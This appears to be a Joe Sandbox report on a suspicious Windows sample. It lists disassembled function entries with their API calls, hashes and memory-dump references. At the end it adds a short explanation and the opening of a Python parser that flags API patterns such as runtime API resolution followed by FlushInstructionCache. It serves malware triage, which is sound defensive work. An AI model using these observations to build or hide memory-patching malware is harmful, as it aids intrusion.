                                                               • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileModuleName$LoadQueryStringVirtual
                                                              • String ID:
                                                              • API String ID: 3990497365-0
                                                              • Opcode ID: f3a5b4e281a5385a5d422858d575297f5170b854b631361198c346ce602277d7
                                                              • Instruction ID: 020d07a2367a52c669e6449164ada2ba124696ac4a3ed9fb31f1c5f40dee9df3
                                                              • Opcode Fuzzy Hash: f3a5b4e281a5385a5d422858d575297f5170b854b631361198c346ce602277d7
                                                              • Instruction Fuzzy Hash: DA411A71A402589BDB61EB68CC84BDAB7FDAB18301F4444E6A64CE7251EB749F84CF50
                                                              APIs
                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B8ACE1
                                                              • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B8AD05
                                                              • GetModuleFileNameA.KERNEL32(02B80000,?,00000105), ref: 02B8AD20
                                                              • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B8ADB6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                               • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileModuleName$LoadQueryStringVirtual
                                                              • String ID:
                                                              • API String ID: 3990497365-0
                                                              • Opcode ID: a90c939674047f4835d28c0887c519078ad7e3ceabcd1f77cb4434a912a6d82c
                                                              • Instruction ID: c11526136f2661489bc28ee0db205843ce0011f901268799c4cfeae0d4b59900
                                                              • Opcode Fuzzy Hash: a90c939674047f4835d28c0887c519078ad7e3ceabcd1f77cb4434a912a6d82c
                                                              • Instruction Fuzzy Hash: 2B413C71A402589BDB61FB68CC84BDAB7FDAB18301F4444E6A64CE7251EB749F84CF50
                                                              APIs
                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 02C18BA6
                                                                • Part of subcall function 02C191DE: ___BuildCatchObjectHelper.LIBVCRUNTIME ref: 02C1920D
                                                                • Part of subcall function 02C191DE: ___AdjustPointer.LIBCMT ref: 02C19228
                                                              • _UnwindNestedFrames.LIBCMT ref: 02C18BBD
                                                              • ___FrameUnwindToState.LIBVCRUNTIME ref: 02C18BCF
                                                              • CallCatchBlock.LIBVCRUNTIME ref: 02C18BF3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                               • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                              • String ID:
                                                              • API String ID: 2901542994-0
                                                              • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                              • Instruction ID: 71a4ab48879f547eb3e74cb8191a0da6d9428b87dbd0948d47045fbb436a7832
                                                              • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                              • Instruction Fuzzy Hash: 23011332004109BBDF12AF55CC06EDA3BAAFF8A754F054214FE1866120C336E5A1FFA0
                                                              APIs
                                                              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 02C1825D
                                                              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 02C18262
                                                              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 02C18267
                                                                • Part of subcall function 02C19766: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 02C19777
                                                              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 02C1827C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                               • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                              • String ID:
                                                              • API String ID: 1761009282-0
                                                              • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                              • Instruction ID: d80e862715f26897bb8bcd9792e3bfdad42af9d03849ac2f3ebfbfb2fc56639e
                                                              • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                              • Instruction Fuzzy Hash: 3FC04C04408941543C963EB212272EE53570DA37C5BC41AD0C8A4175128A2A0A0F7CF7
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02BE991F
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 02BE99BB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                               • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Exception@8H_prologThrow
                                                              • String ID: OE
                                                              • API String ID: 3222999186-2506519113
                                                              • Opcode ID: fe1b7685708ab651bcf0735ee0d7b313b9460d78bb97c14bdd2e97ece23dd4dd
                                                              • Instruction ID: b1d067ab2a5fc167c51613f7376c5fa0b4f7b16d466d200ccea31ec069d9a5b2
                                                              • Opcode Fuzzy Hash: fe1b7685708ab651bcf0735ee0d7b313b9460d78bb97c14bdd2e97ece23dd4dd
                                                              • Instruction Fuzzy Hash: 03B14D729001089BCF15FBA0DC91AEDB7BAAF14310F5042D9E517AB1A1EF34AB48CF91
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                               • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: __freea
                                                              • String ID: H"G$H"GH"G
                                                              • API String ID: 240046367-3036711414
                                                              • Opcode ID: 85d5c5bb78c3dc120d65423bccd5b238d1fe586f27ad34d61dd2e41aacc264b2
                                                              • Instruction ID: afbcfdce6c7b16054f1ed2d1f2ef742d63d30fba0d352430781538bf0b20781b
                                                              • Opcode Fuzzy Hash: 85d5c5bb78c3dc120d65423bccd5b238d1fe586f27ad34d61dd2e41aacc264b2
                                                              • Instruction Fuzzy Hash: 6C416971A002319FCB39AF65CC01EAE77E5EF57760B140125E818DB280EF30CA48DB92
                                                              APIs
                                                                • Part of subcall function 02C26CB1: _free.LIBCMT ref: 02C26CE8
                                                                • Part of subcall function 02C26CB1: _abort.LIBCMT ref: 02C26D2F
                                                                • Part of subcall function 02C2D7E3: _abort.LIBCMT ref: 02C2D815
                                                                • Part of subcall function 02C2D7E3: _free.LIBCMT ref: 02C2D849
                                                              • _free.LIBCMT ref: 02C2D73C
                                                              • _free.LIBCMT ref: 02C2D772
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                               • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$_abort
                                                              • String ID: pF
                                                              • API String ID: 195396716-2973420481
                                                              • Opcode ID: 97d7db50b82cccbee5169bb68c5bf7844dd74d9bc7eda6e9766878cece535fa3
                                                              • Instruction ID: 586680eadd049e74193475d3eae55b9ce39eed9d80038e4ce4f8a77fd1652b62
                                                              • Opcode Fuzzy Hash: 97d7db50b82cccbee5169bb68c5bf7844dd74d9bc7eda6e9766878cece535fa3
                                                              • Instruction Fuzzy Hash: D1313B35900128EFDB11EF69D440BADBBF5EF91720F214099D8059B290EF755E48DF51
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                               • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ca61b3061c19b8e66e8fc742f8e1e044f7b2720c6770b6cc8dbd9f2fbdd5cff1
                                                              • Instruction ID: e7e8d43b6d87b14230742a0b747fface9432644492f52e218fd486c63ae28868
                                                              • Opcode Fuzzy Hash: ca61b3061c19b8e66e8fc742f8e1e044f7b2720c6770b6cc8dbd9f2fbdd5cff1
                                                              • Instruction Fuzzy Hash: 76A1A4A67326014BE718BA7C9D943ADB3C6DB84265F1C42BEE21DCB281EB64C953C750
                                                              APIs
                                                              • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02B89562), ref: 02B894FA
                                                              • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02B89562), ref: 02B89500
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                               • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DateFormatLocaleThread
                                                              • String ID: yyyy
                                                              • API String ID: 3303714858-3145165042
                                                              • Opcode ID: b6830b3e9d6891c1606c0558841f1da4350204044e4de2f21f2db8019276d9fa
                                                              • Instruction ID: 7a0757d37afb60cab30fe9307f88379dbdff6631a451916c2a4dc3c31c37de7b
                                                              • Opcode Fuzzy Hash: b6830b3e9d6891c1606c0558841f1da4350204044e4de2f21f2db8019276d9fa
                                                              • Instruction Fuzzy Hash: 9F216875A006189FDF21EBA8C881AFEB3F9EF48710F4500E5E909E7341D6309E04CBA5
                                                              APIs
                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 02C1BA06
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                               • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CallFilterFunc@8
                                                              • String ID: @F$@F
                                                              • API String ID: 4062629308-3436687868
                                                              • Opcode ID: 01fc5d24cbcc55c590743250a7815fc602d781154dc714b2f4e2244749786215
                                                              • Instruction ID: c32418232edee1e5069fe1bc8b9c78a4adc01509451f138612b4b917c2126f04
                                                              • Opcode Fuzzy Hash: 01fc5d24cbcc55c590743250a7815fc602d781154dc714b2f4e2244749786215
                                                              • Instruction Fuzzy Hash: 4F210E716101009AD7186B349C4776E33A29F8333CF28431AE4359B2E4E7748E43FE56
                                                              APIs
                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 02C1BE48
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                               • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CallFilterFunc@8
                                                              • String ID: @F$@F
                                                              • API String ID: 4062629308-3436687868
                                                              • Opcode ID: 5427aaeeb1dd16046c7ffdb0152beac211c34e67c25787d2885becd2e811340c
                                                              • Instruction ID: 7c0d2241a3757542deaed8aa5bde8ef992dd27a873f4c635489280076e75903b
                                                              • Opcode Fuzzy Hash: 5427aaeeb1dd16046c7ffdb0152beac211c34e67c25787d2885becd2e811340c
                                                              • Instruction Fuzzy Hash: 18210771A106508BC7187B388C077AD73925F8773CF284359E5319B2D4EB788E42BE56
                                                              APIs
                                                                • Part of subcall function 02B98020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B98090,?,?,00000000,?,02B97A06,ntdll,00000000,00000000,02B97A4B,?,?,00000000), ref: 02B9805E
                                                                • Part of subcall function 02B98020: GetModuleHandleA.KERNELBASE(?), ref: 02B98072
                                                                • Part of subcall function 02B980C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B98150,?,?,00000000,00000000,?,02B98069,00000000,KernelBASE,00000000,00000000,02B98090), ref: 02B98115
                                                                • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B9811B
                                                                • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(?,?), ref: 02B9812D
                                                              • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B98216), ref: 02B981F8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                               • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                              • String ID: FlushInstructionCache$Kernel32
                                                              • API String ID: 3811539418-184458249
                                                              • Opcode ID: 69ceee381967f7be42335949b5fceccb2dc7045a0664700b0ae60675d39717dc
                                                              • Instruction ID: 77a680fe85888330406975052b13d19366db9062b7ed9f9b1463d61439dda31a
                                                              • Opcode Fuzzy Hash: 69ceee381967f7be42335949b5fceccb2dc7045a0664700b0ae60675d39717dc
                                                              • Instruction Fuzzy Hash: DF014675650304BFEF11EEA8DC42B5E77ADEB4AB40FA188A1F508E7A40D674AD108A24
                                                              APIs
                                                                • Part of subcall function 02C26CB1: _free.LIBCMT ref: 02C26CE8
                                                                • Part of subcall function 02C26CB1: _abort.LIBCMT ref: 02C26D2F
                                                              • _abort.LIBCMT ref: 02C2D815
                                                              • _free.LIBCMT ref: 02C2D849
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                               • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _abort_free
                                                              • String ID: pF
                                                              • API String ID: 4174849134-2973420481
                                                              • Opcode ID: 27a83d5959e399e126d66fc0e9bc80bad5e8b5edace6ebc33031c21e2b203fc3
                                                              • Instruction ID: dba5d66ca7ddefb23688b8bfeec014953bf6cfc33dfc6716f72683c90607c71f
                                                              • Opcode Fuzzy Hash: 27a83d5959e399e126d66fc0e9bc80bad5e8b5edace6ebc33031c21e2b203fc3
                                                              • Instruction Fuzzy Hash: 1701F575D01A31DBC735AF6DC80031DB7A0FF94F21B18421AD96563280EF70AA0A9FC6
                                                              APIs
                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 02C145F0
                                                                • Part of subcall function 02C14559: std::exception::exception.LIBCONCRT ref: 02C14566
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 02C145FE
                                                                • Part of subcall function 02C14EB1: ___crtInitializeCriticalSectionEx.LIBCPMT ref: 02C14EBE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                               • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalException@8InitializeSectionThrow___crtstd::exception::exceptionstd::invalid_argument::invalid_argument
                                                              • String ID: 8:G
                                                              • API String ID: 64778976-405301104
                                                              • Opcode ID: 54ad04d6290442f5c1206a837fb498cdab3685317d9be234a4d03e3ffe6d53cd
                                                              • Instruction ID: 2c481558870a2992381cac547ed59b2db52a77b7174fb7095fbc83b92280e772
                                                              • Opcode Fuzzy Hash: 54ad04d6290442f5c1206a837fb498cdab3685317d9be234a4d03e3ffe6d53cd
                                                              • Instruction Fuzzy Hash: B0E0D836D00124B78718B67DBC069DE73ED8E473247400433EA14E3081FBA49D4669DE
                                                              APIs
                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B9AD98
                                                              • IsBadWritePtr.KERNEL32(?,00000004), ref: 02B9ADC8
                                                              • IsBadReadPtr.KERNEL32(?,00000008), ref: 02B9ADE7
                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B9ADF3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                               • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Read$Write
                                                              • String ID:
                                                              • API String ID: 3448952669-0
                                                              • Opcode ID: 234bf798fc81b872ff5a85eead7648d9943be952996fa50f1c2af5a655f4751e
                                                              • Instruction ID: 97d01d2c2ef992594f9a9b27b11ef196e9b375d8277034a169d8aa97b584b2c6
                                                              • Opcode Fuzzy Hash: 234bf798fc81b872ff5a85eead7648d9943be952996fa50f1c2af5a655f4751e
                                                              • Instruction Fuzzy Hash: E92184B1A40219DBDF10DF69CC80BAE77B9EF44352F1042A1EE5497344EB34D911DAA0
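The function entries above are useful to a triager mainly for the API combinations they expose: one routine resolves GetModuleHandle/GetProcAddress by name and then calls FlushInstructionCache (the sequence that follows a write to executable memory), another walks memory with IsBadReadPtr/IsBadWritePtr instead of trusting its pointers. The following parser is an added example, not part of the Joe Sandbox report or of the sample's own code: it reads entries in the "APIs / Similarity" layout printed above (the embedded sample is a constructed excerpt of three entries from this page, with the memory-dump lines shortened) and tags each entry by those combinations. The tag names and the API groupings behind them are this example's own choices, not Joe Sandbox signatures.

```python
"""Parse Joe Sandbox 'IDA Plugin' function entries and flag API patterns.

Added example; not code from the Joe Sandbox report or from the analysed
sample. SAMPLE is a constructed excerpt: three entries copied from this
report (the GetDateFormatA routine, the FlushInstructionCache routine and
the IsBadReadPtr routine) with the memory-dump lines shortened. Tag names
and API groupings are this example's own assumptions.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Set

SAMPLE = """\
APIs
• GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02B89562), ref: 02B894FA
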